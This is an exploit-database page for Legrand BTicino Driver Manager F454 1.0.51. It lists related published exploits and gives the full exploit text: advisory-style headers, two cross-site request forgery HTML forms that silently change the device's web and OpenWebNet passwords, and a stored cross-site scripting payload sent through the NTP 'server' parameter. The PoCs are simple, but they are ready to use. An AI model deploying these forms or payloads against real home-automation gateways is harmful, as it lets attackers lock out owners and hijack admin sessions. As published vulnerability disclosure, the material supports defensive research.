Menu

Improved exploit search engine. Try it out

"Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting"

Author

LiquidWorm

Platform

php

Release date

2019-05-15

Release Date Title Type Platform Author
2019-05-24 "Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC" webapps php "Todor Donev"
2019-05-23 "Nagios XI 5.6.1 - SQL injection" webapps php JameelNabbo
2019-05-22 "Horde Webmail 5.2.22 - Multiple Vulnerabilities" webapps php InfinitumIT
2019-05-21 "WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities" webapps php "Simone Quatrini"
2019-05-21 "Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting" webapps php "Dionach Ltd"
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-20 "eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution" webapps php liquidsky
2019-05-20 "GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-17 "Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution" webapps php "numan türle"
2019-05-16 "DeepSound 1.0.4 - SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-15 "Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php LiquidWorm
2019-05-15 "CommSy 8.6.5 - SQL injection" webapps php "Jens Regel_ Schneider_ Wulf"
2019-05-14 "PasteShr 1.6 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-14 "Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection" webapps php "Julien Ahrens"
2019-05-14 "Sales ERP 8.1 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-14 "PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)" remote php AkkuS
2019-05-13 "OpenProject 5.0.0 - 8.3.1 - SQL Injection" webapps php "SEC Consult"
2019-05-13 "XOOPS 2.5.9 - SQL Injection" webapps php "felipe andrian"
2019-05-13 "SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - SQL Injection" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Information Disclosure" webapps php LiquidWorm
2019-05-09 "Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting" webapps php "Ibrahim Raafat"
2019-05-06 "PHPads 2.0 - 'click.php3?bannerID' SQL Injection" webapps php "felipe andrian"
2019-05-03 "Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution" webapps php hash3liZer
2019-05-03 "Instagram Auto Follow - Authentication Bypass" webapps php Veyselxan
2019-04-30 "Agent Tesla Botnet - Information Disclosure" webapps php n4pst3r
2019-04-30 "Hyvikk Fleet Manager - Shell Upload" webapps php saxgy1331
2019-04-30 "Joomla! Component JiFile 2.3.1 - Arbitrary File Download" webapps php "Mr Winst0n"
2019-04-30 "HumHub 1.3.12 - Cross-Site Scripting" webapps php "Kağan EĞLENCE"
2019-04-30 "Joomla! Component ARI Quiz 3.7.4 - SQL Injection" webapps php "Mr Winst0n"
Release Date Title Type Platform Author
2019-05-20 "Huawei eSpace 1.1.11.103 - DLL Hijacking" local windows LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - 'ContactsCtrl.dll' / 'eSpaceStatusCtrl.dll' ActiveX Heap Overflow" dos windows LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - Image File Format Handling Buffer Overflow" dos windows LiquidWorm
2019-05-20 "Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)" dos windows LiquidWorm
2019-05-15 "Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php LiquidWorm
2019-05-16 "SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service" dos windows LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - SQL Injection" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Information Disclosure" webapps php LiquidWorm
2019-04-23 "Ross Video DashBoard 8.5.1 - Insecure Permissions" local windows LiquidWorm
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "BEWARD Intercom 2.3.1 - Credentials Disclosure" local windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection" webapps windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery" webapps windows LiquidWorm
2018-11-30 "Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass" webapps cgi LiquidWorm
2018-11-21 "Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2018-11-05 "Microsoft Internet Explorer 11 - Null Pointer Dereference" local windows LiquidWorm
2018-10-17 "TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2018-10-08 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure" webapps hardware LiquidWorm
2018-10-06 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download" webapps hardware LiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46850/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46850/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46850/41293/legrand-bticino-driver-manager-f454-1051-cross-site-request-forgery-cross-site-scripting/download/", "exploit_id": "46850", "exploit_description": "\"Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting\"", "exploit_date": "2019-05-15", "exploit_author": "LiquidWorm", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
<!--

Legrand BTicino Driver Manager F454 1.0.51 CSRF Change Password Exploit


Vendor: BTicino S.p.A.
Product web page: https://www.bticino.com

Affected version: Hardware Platform: F454
                  Firmware version: 1.0.51
                  Driver Manager version: 1.1.14

Summary: Audio/video web server for the remote control of the
system using web pages or the MY HOME portal. The device can
operate as a gateway for the use of the MHVisual and Virtual
Configurator software - 6 DIN modules. It replaces item F453
and F453AV.

Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.

Tested on: Apache/2.2.14 (Unix)
           OpenSSL/1.0.0d
           PHP/5.1.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience


Advisory ID: ZSL-2019-5521
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5521.php

30.04.2019

-->


<!-- CSRF PoC web access password change -->
<html>
  <body>
    <form action="http://192.168.1.66:8080/system/password.save.php" method="POST">
      <input type="hidden" name="password1" value="newpass123" />
      <input type="hidden" name="password2" value="newpass123" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


<!-- CSRF PoC OpenWebNet password change -->
<html>
  <body>
    <form action="http://192.168.1.66:8080/system/ownpassword.save.php" method="POST">
      <input type="hidden" name="ownpassword" value="ilegnisi" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


<!--

Legrand BTicino Driver Manager F454 1.0.51 Authenticated Stored XSS Exploit


Vendor: BTicino S.p.A.
Product web page: https://www.bticino.com

Affected version: Hardware Platform: F454
                  Firmware version: 1.0.51
                  Driver Manager version: 1.1.14

Summary: Audio/video web server for the remote control of the
system using web pages or the MY HOME portal. The device can
operate as a gateway for the use of the MHVisual and Virtual
Configurator software - 6 DIN modules. It replaces item F453
and F453AV.

Desc: The application suffers from an authenticated stored XSS
via GET request. The issue is triggered when input passed via
the GET parameter 'server' is not properly sanitized before
being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in
context of an affected site.

Tested on: Apache/2.2.14 (Unix)
           OpenSSL/1.0.0d
           PHP/5.1.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience


Advisory ID: ZSL-2019-5522
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5522.php

30.04.2019

-->


<!-- Stored XSS via GET request -->
<html>
  <body>
    <form action="http://192.168.1.66:8080/system/time.ntp.php">
      <input type="hidden" name="mode" value="mine" />
      <input type="hidden" name="server" value='"><marquee>Waddup.</marquee>' />
      <input type="submit" value="Signal" />
    </form>
  </body>
</html>

<!-- GET http://192.168.1.66:8080/system/time.ntp.php?mode=mine&server="><marquee>Waddup.</marquee> HTTP/1.1 -->